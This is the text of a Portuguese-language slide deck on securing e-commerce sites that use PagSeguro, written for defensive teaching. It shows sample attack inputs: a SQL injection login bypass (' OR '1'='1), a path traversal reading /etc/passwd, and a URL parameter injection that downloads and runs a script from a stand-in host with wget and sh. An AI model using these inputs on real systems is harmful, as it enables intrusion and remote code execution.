e­Commerce seguro com
PagSeguro

medo

OWASP
owasp.org

Segurança em todo o processo

Sistema atualizado

Portas fechadas

Senhas seguras

SSL

Falhas na aplicação

SQL Injection

<?
q = db.exec("SELECT * FROM user WHERE
login='%s' AND senha='%s'" % (login,senha))
?>

<?
q = db.exec("SELECT * FROM user WHERE
login='%s' AND senha='%s'" % (login,senha))
?>
login: admin
senha: ' OR '1'='1

<?
q = db.exec("SELECT * FROM user WHERE
login='%s' AND senha='%s'" % (login,senha))
?>
login: admin
senha: ' OR '1'='1
SELECT * FROM user WHERE login='admin' AND
senha='' OR '1'='1'

Falsificação de Identidade

Controles no Client

<input type="hidden" name="desconto"
value="10,00" />

Quebra de Fluxo

http://seusite.com/compra.php?passo=1

Ataques contra outros clients

HTML Injection

Script Injection

XSS

XSRF

Exposição de recursos

http://seusite.com/compra.php?passo=1
&stop=1&template=azul.php

http://seusite.com/compra.php?passo=1
&stop=1&template=azul.php
http://seusite.com/compra.php?passo=1
&stop=1&template=../../etc/passwd

Execução de recursos

http://seusite.com/relatorio.php?
tipo=3&gerador=pdfmaker

http://seusite.com/relatorio.php?
tipo=3&gerador=pdfmaker
http://seusite.com/relatorio.php?
tipo=3&gerador=wget+pirata.com/script
http://seusite.com/relatorio.php?
tipo=3&gerador=sh+script

Autenticação falha

Criptografia insegura

Falha de restrição de acesso

Denial Of Service

Pagamento: processo crítico

PagSeguro

PagSeguro:
­ Uma única implantação
­ Segurança contra
chargeback/fraude
­ EVSSL + Aplicação segura

Formas de implantação:
­ Carrinho PagSeguro
­ Carrinho Próprio
­ Retorno Automático

Pontos sensíveis:
­ HTML do Form de Carrinho
­ URL de Retorno

Proteja sua URL de Retorno:
­ Valide com o Token
­ Valide os Valores
­ Log
­ Fique alerta!

Obrigado!
visie.com.br
elcio@visie.com.br